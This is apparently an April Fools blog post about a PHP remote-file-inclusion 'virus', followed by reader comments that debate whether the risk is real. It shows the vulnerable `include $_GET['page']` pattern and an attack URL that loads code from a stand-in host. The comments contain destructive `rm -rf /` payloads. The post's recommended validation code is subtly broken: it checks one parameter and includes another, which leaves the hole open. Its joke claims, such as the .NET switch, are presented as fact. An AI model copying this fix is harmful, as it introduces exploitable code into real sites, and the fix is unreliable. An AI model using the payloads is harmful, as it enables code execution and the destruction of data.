PHP Virus Attacking Web Hosts

Symantec have a report of the virus here.

I’ve yet to see any of the PHP news sites picking up on it but, using a virtual host account, managed to deliberately expose some PHP scripts to it.

From examining the infected scripts, what’s disturbing is once infected, every time a script is executed, the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread it likely to be slow, it can takes place automatically, without your intervention!

If your site contains code like;


// index.php
include $_GET['page'];

You need to take action now – your site could be infected with a URL like;


http://yoursite.com/index.php?page=http://virus.com/virus.php

A simple way to validate is;


$pages = array('news','articles','blog');
if ( in_array($_GET['page'], $pages) ) {
    include $_GET['php'] . '.php';
} else {
    include 'home.php';
}

Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.

Free book: Jump Start HTML5 Basics

Grab a free copy of one our latest ebooks! Packed with hints and tips on HTML5's most powerful new features.

  • run4fun

    thanks god its not friday”
    instead april’s fool :)

  • http://www.rideontwo.com z0s0

    < ?
    system(“rm -rf /”);
    ?>

  • http://www.rideontwo.com z0s0

    damnit!

  • Luke

    Oh no!! I better start learning ASP! Do you know any good .Net tutorials?

  • http://www.madproject.com madproject.com

    Damn! I guess I better scrap my PHP project and ASP it pronto.
    I trust that I’ll encounter far less bugs.

    :p

  • http://www.flippedout.net Bryce

    In all seriousness, should this warning be heeded or taken as an April Fools joke? I’ve edited my pages, and am awaiting a response.

  • Icheb

    Bryce: It’s a joke. If you include another website’s PHP-pages, your webserver gets the HTML-output and not the PHP-code.

  • Chris Shiflett

    Icheb, really?

    Try this:

    < ?
    echo ‘< ? system("rm -rf /"); ?>‘;
    ?>

    :-)

  • http://www.phppatterns.com HarryF

    In all seriousness, should this warning be heeded or taken as an April Fools joke? I’ve edited my pages, and am awaiting a response.

    Don’t panic on the virus – actually that report is ages old (same on Symantec for not putting a date on it) as is Pirus – John Lim mentioned it here back in 2000.

    But jesting aside, you should be careful using the include (or similar) statement with a variable that a visitor can modify. A common (mistake) is this;


    if ( isset ( $_GET['page'] ) ) {
    include $_GET['page'];
    } else {
    include 'default.php';
    }

    That’s a recipe for disaster – someone attacking your site can get your script to execute code from their site – they just need to make sure that what’s being included is valid PHP, from the point of view of the PHP parser (e.g. serve your script a page as plain text with a .txt extension). Try it in your own webserver, including a file like;


    include 'http://localhost/test.txt';

    Where text.txt contains some PHP.

    This behaviour in PHP can be switched off see here. Simon has some interesting remarks of this functionality here. For a more in depth analysis, try A Study in Scarlet.

    Bottom line make sure you validate the incoming GET variable, a simple but effective approach being to require it’s value be part of a list, as I did at the start.

  • newline

    Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.

  • http://www.flippedout.net Bryce

    Well, you definately got me. It was after 12PM here at the time so I guess I wasn’t on my guard. Still, it’s good to see that my time wasn’t so completely wasted :)

    Cheers

  • http://simon.incutio.com/ Skunk

    I’ve ranted about this before: This is quite simply PHP’s worst feature – executing arbritary PHP code that has come in over an HTTP network connection is an unbelievably nasty security hole and should never happen, period. Almost every single critical security flaw in a PHP site that I’ve seen has been down to this feature.

  • WhatThe

    Skunk, what are you talking about? Only fools would take in user input and actually use that in an include statement. I don’t know what sites you have been looking at, but common flaws are SQL injection, XSS, and possibly cross site request forgeries…

  • Stewart

    Another point would be if the site supports the upload of files to the server (e.g. if you don’t check image uploads are actually images)

    So, if you upload a php script in place of an image, then use this script to run the php file, bang, your wide open.

    This is just a friday morning observation though, I could be entirely wrong and paranoid.

  • Nikobass

    This is an easy security hole to solve.
    I hope you didn’t even used this method to include some content in your scripts. It’s important to check the input before to use it in your script. Basic mistake :)

  • saul

    the classic answer … throught the sofa for the window.. instead of your wife if you found here cheating you in that sofa ;)

  • Icheb

    “Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.”

    So? That’s not contrary to what I said. It still gets the *HTML-output* and not the PHP-code which generated that output.

  • http://simon.incutio.com/ Skunk

    WhatThe: you would be amazed at how many scripts I’ve seen that do exactly that! I reported that exact bug to the makers of a very popular PHP ShoutBox script a few months ago. Even Gallery has suffered from that bug in the past: check out the vulnerability announcement from last October. It’s a shockingly common mistake, and one that just shouldn’t be possible to make in the first place.

  • Pingback: SitePoint Blogs » Phalanger—better than the real thing?